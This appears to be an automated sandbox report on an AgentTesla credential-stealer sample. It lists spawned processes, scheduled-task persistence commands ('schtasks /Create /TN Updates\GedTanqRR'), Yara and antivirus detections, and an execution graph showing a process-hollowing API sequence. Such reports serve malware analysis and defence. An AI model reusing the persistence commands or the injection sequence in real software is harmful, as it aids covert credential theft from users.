                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1854063501.0000000004C3D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.1854063501.0000000004C3D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1854063501.0000000004AB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.1854063501.0000000004AB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 79%, ReversingLabs
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  Target ID:10
                                                                                                                  Start time:13:16:25
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                  Imagebase:0x7ff693ab0000
                                                                                                                  File size:496'640 bytes
                                                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:11
                                                                                                                  Start time:13:16:28
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GedTanqRR" /XML "C:\Users\user\AppData\Local\Temp\tmpE4A.tmp"
                                                                                                                  Imagebase:0xce0000
                                                                                                                  File size:187'904 bytes
                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:12
                                                                                                                  Start time:13:16:29
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:13
                                                                                                                  Start time:13:16:29
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Users\user\AppData\Roaming\GedTanqRR.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\GedTanqRR.exe"
                                                                                                                  Imagebase:0x9a0000
                                                                                                                  File size:837'640 bytes
                                                                                                                  MD5 hash:6239C4047E0F1C4F55A96199E77D3669
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.2976437638.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.2976437638.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.2976437638.0000000002E1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Has exited:false

                                                                                                                  Target ID:15
                                                                                                                  Start time:13:16:34
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                                                                                                  Imagebase:0xfc0000
                                                                                                                  File size:837'640 bytes
                                                                                                                  MD5 hash:6239C4047E0F1C4F55A96199E77D3669
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.1918087486.0000000005023000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.1918087486.0000000005023000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 79%, ReversingLabs
                                                                                                                  Has exited:true

                                                                                                                  Target ID:16
                                                                                                                  Start time:13:16:35
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GedTanqRR" /XML "C:\Users\user\AppData\Local\Temp\tmp30F5.tmp"
                                                                                                                  Imagebase:0xce0000
                                                                                                                  File size:187'904 bytes
                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:17
                                                                                                                  Start time:13:16:35
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:18
                                                                                                                  Start time:13:16:35
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                                                                                                  Imagebase:0x280000
                                                                                                                  File size:837'640 bytes
                                                                                                                  MD5 hash:6239C4047E0F1C4F55A96199E77D3669
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:19
                                                                                                                  Start time:13:16:35
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                                                                                                  Imagebase:0xe30000
                                                                                                                  File size:837'640 bytes
                                                                                                                  MD5 hash:6239C4047E0F1C4F55A96199E77D3669
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.2978687835.000000000335C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.2978687835.0000000003331000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.2978687835.0000000003331000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Has exited:false

                                                                                                                  Target ID:22
                                                                                                                  Start time:13:16:42
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                                                                                                  Imagebase:0x810000
                                                                                                                  File size:837'640 bytes
                                                                                                                  MD5 hash:6239C4047E0F1C4F55A96199E77D3669
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:23
                                                                                                                  Start time:13:16:43
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GedTanqRR" /XML "C:\Users\user\AppData\Local\Temp\tmp50A2.tmp"
                                                                                                                  Imagebase:0xce0000
                                                                                                                  File size:187'904 bytes
                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:24
                                                                                                                  Start time:13:16:43
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:25
                                                                                                                  Start time:13:16:43
                                                                                                                  Start date:10/01/2025
                                                                                                                  Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:837'640 bytes
                                                                                                                  MD5 hash:6239C4047E0F1C4F55A96199E77D3669
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.2977002334.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000002.2977002334.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000002.2977002334.0000000002B9C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Has exited:false

                                                                                                                  Reset < >

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:11.7%
                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:132
                                                                                                                    Total number of Limit Nodes:7
                                                                                                                    execution_graph 26798 143d000 26799 143d046 26798->26799 26803 143d5d8 26799->26803 26807 143d5e8 26799->26807 26800 143d133 26804 143d5dc 26803->26804 26810 143d23c 26804->26810 26808 143d616 26807->26808 26809 143d23c DuplicateHandle 26807->26809 26808->26800 26809->26808 26811 143d650 DuplicateHandle 26810->26811 26812 143d616 26811->26812 26812->26800 26989 143ac70 26990 143ac71 26989->26990 26994 143ad59 26990->26994 26999 143ad68 26990->26999 26991 143ac7f 26996 143ad5c 26994->26996 26995 143ad9c 26995->26991 26996->26995 26997 143afa0 GetModuleHandleW 26996->26997 26998 143afcd 26997->26998 26998->26991 27003 143ad69 26999->27003 27000 143ad9c 27000->26991 27001 143afa0 GetModuleHandleW 27002 143afcd 27001->27002 27002->26991 27003->27000 27003->27001 26813 7a5046c 26819 7a52770 26813->26819 26823 7a52827 26813->26823 26828 7a52778 26813->26828 26832 7a5286f 26813->26832 26814 7a5049d 26820 7a527c0 VirtualProtect 26819->26820 26822 7a527fa 26820->26822 26822->26814 26824 7a527dd VirtualProtect 26823->26824 26826 7a527b9 26823->26826 26827 7a527fa 26824->26827 26825 7a52837 26825->26814 26826->26824 26826->26825 26827->26814 26829 7a527c0 VirtualProtect 26828->26829 26831 7a527fa 26829->26831 26831->26814 26835 7a527b9 26832->26835 26837 7a52873 26832->26837 26833 7a527dd VirtualProtect 26836 7a527fa 26833->26836 26834 7a52837 26834->26814 26835->26833 26835->26834 26836->26814 26837->26814 26844 7a509fe 26846 7a52827 VirtualProtect 26844->26846 26847 7a52770 VirtualProtect 26844->26847 26848 7a5286f VirtualProtect 26844->26848 26849 7a52778 VirtualProtect 26844->26849 26845 7a50a15 26846->26845 26847->26845 26848->26845 26849->26845 26869 1434668 26870 1434672 26869->26870 26872 1434759 26869->26872 26873 143475c 26872->26873 26877 1434858 26873->26877 26881 1434868 26873->26881 26879 143485c 26877->26879 26878 143496c 26878->26878 26879->26878 26885 14344b0 26879->26885 26882 143488f 26881->26882 26883 143496c 26882->26883 26884 14344b0 CreateActCtxA 26882->26884 26884->26883 26886 14358f8 CreateActCtxA 26885->26886 26888 14359bb 26886->26888 26850 7a51179 26852 7a5117c 26850->26852 26851 7a511e1 26852->26851 26853 7a52827 VirtualProtect 26852->26853 26854 7a52770 VirtualProtect 26852->26854 26855 7a5286f VirtualProtect 26852->26855 26856 7a52778 VirtualProtect 26852->26856 26853->26852 26854->26852 26855->26852 26856->26852 26889 ed51eb8 26890 ed52043 26889->26890 26891 ed51ede 26889->26891 26891->26890 26894 ed52131 26891->26894 26897 ed52138 PostMessageW 26891->26897 26895 ed52138 PostMessageW 26894->26895 26896 ed521a4 26895->26896 26896->26891 26898 ed521a4 26897->26898 26898->26891 26899 ed50c78 26900 ed50c92 26899->26900 26901 ed50cb6 26900->26901 26912 ed51915 26900->26912 26916 ed5134b 26900->26916 26920 ed51728 26900->26920 26924 ed514a9 26900->26924 26928 ed515e2 26900->26928 26932 ed51264 26900->26932 26936 ed5199b 26900->26936 26939 ed515b9 26900->26939 26943 ed51133 26900->26943 26946 ed51537 26900->26946 26913 ed5191b 26912->26913 26951 7a5ec80 26913->26951 26917 ed51636 26916->26917 26955 7a5eae8 26917->26955 26921 ed5174e 26920->26921 26959 7a5ed70 26921->26959 26963 ed51db8 26924->26963 26967 ed51da8 26924->26967 26925 ed514c1 26925->26901 26929 ed515eb 26928->26929 26931 7a5ec80 WriteProcessMemory 26929->26931 26930 ed51313 26930->26901 26931->26930 26933 ed5126a 26932->26933 26971 7a5ea38 26933->26971 26975 7a5ebc0 26936->26975 26940 ed515dc 26939->26940 26942 7a5ec80 WriteProcessMemory 26940->26942 26941 ed51883 26942->26941 26979 7a5ef08 26943->26979 26947 ed5127b 26946->26947 26948 ed51578 26947->26948 26950 7a5ea38 ResumeThread 26947->26950 26948->26901 26949 ed51290 26950->26949 26952 7a5ecc8 WriteProcessMemory 26951->26952 26954 7a5ed1f 26952->26954 26956 7a5eb2d Wow64SetThreadContext 26955->26956 26958 7a5eb75 26956->26958 26958->26901 26960 7a5edbb ReadProcessMemory 26959->26960 26962 7a5edff 26960->26962 26964 ed51dcd 26963->26964 26966 7a5eae8 Wow64SetThreadContext 26964->26966 26965 ed51de3 26965->26925 26966->26965 26968 ed51dcd 26967->26968 26970 7a5eae8 Wow64SetThreadContext 26968->26970 26969 ed51de3 26969->26925 26970->26969 26972 7a5ea78 ResumeThread 26971->26972 26974 7a5eaa9 26972->26974 26976 7a5ec00 VirtualAllocEx 26975->26976 26978 7a5ec3d 26976->26978 26980 7a5ef91 CreateProcessA 26979->26980 26982 7a5f153 26980->26982

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 333 7a54180-7a541a5 334 7a541a7 333->334 335 7a541ac-7a541dd 333->335 334->335 336 7a541de 335->336 337 7a541e5-7a54201 336->337 338 7a54203 337->338 339 7a5420a-7a5420b 337->339 338->336 338->339 340 7a54441-7a54458 338->340 341 7a542e0-7a542f7 338->341 342 7a54363-7a54378 338->342 343 7a5426c-7a54293 338->343 344 7a542af-7a542b5 call 7a545c2 338->344 345 7a5438b-7a543b2 338->345 346 7a5434b-7a5435e 338->346 347 7a5442a-7a5443c 338->347 348 7a54314-7a54318 338->348 349 7a54254-7a54267 338->349 350 7a54477-7a54480 338->350 351 7a543b7-7a543ca 338->351 352 7a543f6-7a5440e 338->352 353 7a54210-7a54252 338->353 354 7a54413-7a54425 338->354 355 7a5437d-7a54386 338->355 356 7a5445d-7a54472 338->356 357 7a542fc-7a5430f 338->357 358 7a54298-7a542aa 338->358 339->350 340->337 341->337 342->337 343->337 368 7a542bb-7a542db 344->368 345->337 346->337 347->337 359 7a5432b-7a54332 348->359 360 7a5431a-7a54329 348->360 349->337 361 7a543dd-7a543e4 351->361 362 7a543cc-7a543db 351->362 352->337 353->337 354->337 355->337 356->337 357->337 358->337 363 7a54339-7a54346 359->363 360->363 367 7a543eb-7a543f1 361->367 362->367 363->337 367->337 368->337
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1782159523.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7a50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: TuA$UC;"
                                                                                                                    • API String ID: 0-2071649361
                                                                                                                    • Opcode ID: ec2aeeb82e19627846d354a957c17f685b8a4c8644dc34f7c8a64a065d507bed
                                                                                                                    • Instruction ID: 8c6a8900c8fcdf8cbf576b4dbca0bc3a55d164d77e1543641d2441c06bd7ba84
                                                                                                                    • Opcode Fuzzy Hash: ec2aeeb82e19627846d354a957c17f685b8a4c8644dc34f7c8a64a065d507bed
                                                                                                                    • Instruction Fuzzy Hash: 6391F6B9D15209EFCB08CFE6D58059EFFB2BF89310F20942AE825A7264D7349652CF50

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 371 7a54170-7a541a5 372 7a541a7 371->372 373 7a541ac-7a541dd 371->373 372->373 374 7a541de 373->374 375 7a541e5-7a54201 374->375 376 7a54203 375->376 377 7a5420a-7a5420b 375->377 376->374 376->377 378 7a54441-7a54458 376->378 379 7a542e0-7a542f7 376->379 380 7a54363-7a54378 376->380 381 7a5426c-7a54293 376->381 382 7a542af-7a542b5 call 7a545c2 376->382 383 7a5438b-7a543b2 376->383 384 7a5434b-7a5435e 376->384 385 7a5442a-7a5443c 376->385 386 7a54314-7a54318 376->386 387 7a54254-7a54267 376->387 388 7a54477-7a54480 376->388 389 7a543b7-7a543ca 376->389 390 7a543f6-7a5440e 376->390 391 7a54210-7a54252 376->391 392 7a54413-7a54425 376->392 393 7a5437d-7a54386 376->393 394 7a5445d-7a54472 376->394 395 7a542fc-7a5430f 376->395 396 7a54298-7a542aa 376->396 377->388 378->375 379->375 380->375 381->375 406 7a542bb-7a542db 382->406 383->375 384->375 385->375 397 7a5432b-7a54332 386->397 398 7a5431a-7a54329 386->398 387->375 399 7a543dd-7a543e4 389->399 400 7a543cc-7a543db 389->400 390->375 391->375 392->375 393->375 394->375 395->375 396->375 401 7a54339-7a54346 397->401 398->401 405 7a543eb-7a543f1 399->405 400->405 401->375 405->375 406->375
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1782159523.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7a50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: TuA$UC;"
                                                                                                                    • API String ID: 0-2071649361
                                                                                                                    • Opcode ID: 0b0c17729a8dc70cf220823d15b1d46fc9505cef6c45b8dd1b16e83fa155cb7b
                                                                                                                    • Instruction ID: 2423cc46df960704d81be68c7bfea2990738b7e935544aff88dce1325978e6bf
                                                                                                                    • Opcode Fuzzy Hash: 0b0c17729a8dc70cf220823d15b1d46fc9505cef6c45b8dd1b16e83fa155cb7b
                                                                                                                    • Instruction Fuzzy Hash: DA91F5B9D15209EFCB08CFE5E58459EFFB2BF89310F20942AE825A7264D7349652CF40
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1782159523.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7a50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 5=6
                                                                                                                    • API String ID: 0-2897083178
                                                                                                                    • Opcode ID: 77e4dc7c28a511171209a36b30ba2dc7f4c3032016e4cc31bb00e631a501460c
                                                                                                                    • Instruction ID: 394686e5b405cb203e4b9b2a1131e137a2fa54d0da55c677c71eeaceda40b2c7
                                                                                                                    • Opcode Fuzzy Hash: 77e4dc7c28a511171209a36b30ba2dc7f4c3032016e4cc31bb00e631a501460c
                                                                                                                    • Instruction Fuzzy Hash: C77138B4E1521ADFCB04CFA6D8455AEFFB2BF8A201F10D42AD826E7254DB349A018F50
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1782159523.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7a50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 5=6
                                                                                                                    • API String ID: 0-2897083178
                                                                                                                    • Opcode ID: 04f5982e069dc2c62ed93bf6611c83132bbbfa21546e9b238d7348f5b42bed0f
                                                                                                                    • Instruction ID: c4e01c077c97c41b9bcbf0363b939d7a2c21c3cafa7c51d2b42c750498d9116b
                                                                                                                    • Opcode Fuzzy Hash: 04f5982e069dc2c62ed93bf6611c83132bbbfa21546e9b238d7348f5b42bed0f
                                                                                                                    • Instruction Fuzzy Hash: 336138B4E1520ADFCB08CFA6D8455AEFBF2BF89201F10D42AD826E7254DB349A018F50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1784016502.000000000ED50000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ED50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_ed50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ceb96cb6c95d086e2ef5beb027f58cb7ff08f88dc613eac53de8ddc4cea28ac1
                                                                                                                    • Instruction ID: 07c30fc26bfa1ccbb2741112b41e861b245d92134edae01956a8f320bd721d4d
                                                                                                                    • Opcode Fuzzy Hash: ceb96cb6c95d086e2ef5beb027f58cb7ff08f88dc613eac53de8ddc4cea28ac1
                                                                                                                    • Instruction Fuzzy Hash: EEC18A727006008BEB19EB6AC460BAAB6F6EF89740F24446ED946CB3A4DB34DC45CB51
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1782159523.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7a50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e02a0c0644c09f0578c69124afe56b69c2c6d811007e0d74050ec0667e1d1dc7
                                                                                                                    • Instruction ID: 809dfd63cda8298dc1c27a5f5d823f07560749efc31be637a401c1caedc16416
                                                                                                                    • Opcode Fuzzy Hash: e02a0c0644c09f0578c69124afe56b69c2c6d811007e0d74050ec0667e1d1dc7
                                                                                                                    • Instruction Fuzzy Hash: BDB126B5D15249DFCB18CFE6D58069EFBB2BF89304F20D42AD429AB254DB349A46CF10
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1782159523.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7a50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9cdfeb4f1adf77f3b88eeef1ff711f5551d258ab7054de2db9352908274e6b97
                                                                                                                    • Instruction ID: 93a64ffe01a3c98f85e026e7f12f25587f9684f35a3b4ce5f5f6f6624f310c50
                                                                                                                    • Opcode Fuzzy Hash: 9cdfeb4f1adf77f3b88eeef1ff711f5551d258ab7054de2db9352908274e6b97
                                                                                                                    • Instruction Fuzzy Hash: 38B106B5D15249DFCB18CFE6D58069EFBB2BF89304F20D42AD429AB254DB349A46CF10
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1782159523.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7a50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 41160f8fd7a8e1e94cc69cd3f92ed89688e380005de585437aa7b9b098c6b335
                                                                                                                    • Instruction ID: aabc805cbd02d314c2a2fcbdb6f7e8e827ff1c2d07877081ea92dd38779c650d
                                                                                                                    • Opcode Fuzzy Hash: 41160f8fd7a8e1e94cc69cd3f92ed89688e380005de585437aa7b9b098c6b335
                                                                                                                    • Instruction Fuzzy Hash: 764193B0E2520ADFCB04CFA5D5416AEFFF2FB99300F20946AC815B7294D3749B458B94
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1784016502.000000000ED50000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ED50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_ed50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f74a309e0076351548dfa0c6014536016a6677ca1dfd6b4d5c814f8200802d05
                                                                                                                    • Instruction ID: fa6740ed2cf0894df420543f38040efaaa8a60639e0e666a4a0aeb4a3023104a
                                                                                                                    • Opcode Fuzzy Hash: f74a309e0076351548dfa0c6014536016a6677ca1dfd6b4d5c814f8200802d05
                                                                                                                    • Instruction Fuzzy Hash: 6EE0C269C0F584DFCB41DB2055C47F87FF8DB0B100F4820D5DC99A7602D5309D448B14
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1784016502.000000000ED50000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ED50000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_ed50000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3f45b61bc01e4c423e4faa9cdb54ab5b600a77a33b6969e96a9762685002b24f
                                                                                                                    • Instruction ID: b4e2538cde207f49f2c7da7c9be6b9216aec89a3542fb93dd4d9df6852bc63e2
                                                                                                                    • Opcode Fuzzy Hash: 3f45b61bc01e4c423e4faa9cdb54ab5b600a77a33b6969e96a9762685002b24f
                                                                                                                    • Instruction Fuzzy Hash: DAA00242E4FE01819D000C4319C0AF1D17DC64F160DC8305019DA376C7A890FC12110C

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
